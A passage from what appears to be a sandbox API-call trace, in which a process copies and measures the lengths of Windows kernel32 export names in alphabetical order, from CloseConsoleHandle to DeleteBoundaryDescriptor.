lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0076.710] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0076.710] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0076.710] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0076.710] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0076.710] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0076.710] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0076.710] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0076.710] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0076.710] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0076.710] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0076.710] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0076.710] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0076.710] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0076.710] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0076.710] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0076.710] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0076.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0076.711] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0076.711] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0076.711] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0076.711] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0076.711] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0076.711] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0076.711] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0076.711] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0076.711] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0076.711] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0076.711] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0076.711] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0076.711] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0076.711] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0076.711] lstrlenA (lpString="COPYCONTEXT") returned 11 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0076.711] lstrlenA (lpString="COPYFILEA") returned 9 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0076.711] lstrlenA (lpString="COPYFILEEXA") returned 11 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0076.711] lstrlenA (lpString="COPYFILEEXW") returned 11 [0076.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0076.712] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0076.712] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0076.712] lstrlenA (lpString="COPYFILEW") returned 9 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0076.712] lstrlenA (lpString="COPYLZFILE") returned 10 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0076.712] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0076.712] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0076.712] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0076.712] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0076.712] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0076.712] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0076.712] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0076.712] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0076.712] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0076.712] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0076.712] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0076.712] lstrlenA (lpString="CREATEEVENTA") returned 12 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0076.712] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0076.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0076.713] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0076.713] lstrlenA (lpString="CREATEEVENTW") returned 12 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0076.713] lstrlenA (lpString="CREATEFIBER") returned 11 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0076.713] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0076.713] lstrlenA (lpString="CREATEFILEA") returned 11 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0076.713] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0076.713] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0076.713] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0076.713] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0076.713] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0076.713] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0076.713] lstrlenA (lpString="CREATEFILEW") returned 11 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0076.713] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0076.713] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0076.713] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0076.713] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0076.713] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0076.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0076.713] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0076.714] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0076.714] lstrlenA (lpString="CREATEJOBSET") returned 12 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0076.714] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0076.714] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0076.714] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0076.714] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0076.714] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0076.714] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0076.714] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0076.714] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0076.714] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0076.714] lstrlenA (lpString="CREATEPIPE") returned 10 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0076.714] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0076.714] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0076.714] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0076.714] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0076.714] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0076.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0076.714] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0076.715] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0076.715] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0076.715] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0076.715] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0076.715] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0076.715] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0076.715] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0076.715] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0076.715] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0076.715] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0076.715] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0076.715] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0076.715] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0076.715] lstrlenA (lpString="CREATETHREAD") returned 12 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0076.715] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0076.715] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0076.715] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0076.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0076.716] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0076.716] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0076.716] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0076.716] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0076.716] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0076.716] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0076.716] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0076.716] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0076.716] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0076.716] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0076.716] lstrlenA (lpString="CTRLROUTINE") returned 11 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0076.716] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0076.716] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0076.716] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0076.716] lstrlenA (lpString="DEBUGBREAK") returned 10 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0076.716] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0076.716] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0076.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0076.716] lstrlenA (lpString="DECODEPOINTER") returned 13 [0076.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0076.717] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0076.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0076.717] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0076.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0076.717] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0076.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0076.717] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0076.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0076.717] lstrlenA (lpString="DELETEATOM") returned 10 [0076.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0076.717] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0076.717] lstrcpyA (in: 